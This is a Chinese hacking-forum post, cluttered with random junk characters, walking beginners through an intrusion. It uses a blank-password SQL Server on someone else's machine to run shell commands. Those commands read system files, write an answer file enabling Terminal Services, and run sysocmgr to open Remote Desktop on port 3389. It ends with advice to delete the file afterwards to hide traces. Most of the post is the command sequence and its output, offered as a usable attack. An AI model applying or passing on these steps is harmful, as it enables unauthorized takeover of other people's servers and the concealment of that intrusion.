SQL开3389入侵实例记录(献给草根)
把一次从SQL开3389的记录过程发出来,望对新手有用# v; x4 b0 F. O( Z
" U% C; Y" a/ J# e* w
注://为注释/ |/ `, D% O1 h4 P# Y
实例过程:1 L9 ^ B" Y: E
连接到主机:202.xxx.xxx.xxx //大家可以用sql连接器连上有空口令的sql肉机
8 N+ z6 B5 K* b* m% r5 `命令: type c:\boot.ini 输入命令,看系统,server版的才能 开3389- {1 H; E" A/ z U, r
执行成功,结果:
, v* m( I! A$ B3 f V2 d[boot loader]# P3 r, y( B- S2 Q* T
timeout=30
* R& a9 @% L) Z6 i6 E+ R: Fdefault=multi(0)disk(0)rdisk(0)partition(1)\WINNT" n! S3 J8 l( }" @* w E
[operating systems]5 T! n5 U V6 y
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect) L* V- ]' _4 U8 P2 M" [) }6 Z1 H
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect* S. f6 P' Q& U& u8 Y* ^
6 t% A' T. j* c) D1 z
命令: echo [Components] > c:\duguxike 在c盘根目录建写入一个文件,文件名duguxike大家可以自己改为自己的, v" [# J: \# h4 g
执行成功,结果:% z# E! n% h7 {* z7 t
3 t& p8 k; w1 Q& ]- p
) H5 }# C5 l5 p0 n$ r+ v命令: echo TsEnable = on >> c:\duguxike 追加写入
0 [% \7 _8 C! }" W执行成功,结果:9 Z9 S( z7 s5 {
, F& G4 i8 T; x, [ [
[ post]命令: type c:\duguxike 看看duguxike里的内容是否正确" k2 l4 }3 l+ T5 e8 f# D4 |# D
执行成功,结果:
3 b* }6 b+ c& ] K[Components] 5 L& ?6 ]! d! ~( Y+ k
TsEnable = on
- z( ~- E& j2 t/ wTsEnable = on % b; y/ j- s) {7 Z9 g( Z) `+ Q t
/ _8 T+ m5 `& d* n6 J
命令: sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\duguxike /q 开3389,成功的话过会肉机会重启!!
6 ?* U5 K( k$ O执行成功,结果:
% ^# N/ B; E* n4 i. @; e5 _GetLocalManagedApplications returned (2)
* M: ~% M6 {# \; o# V+ v3 `' s h6 O+ Q4 V
之后就看大家的了,不过要记得册除新建的duguxike文件哦!!!
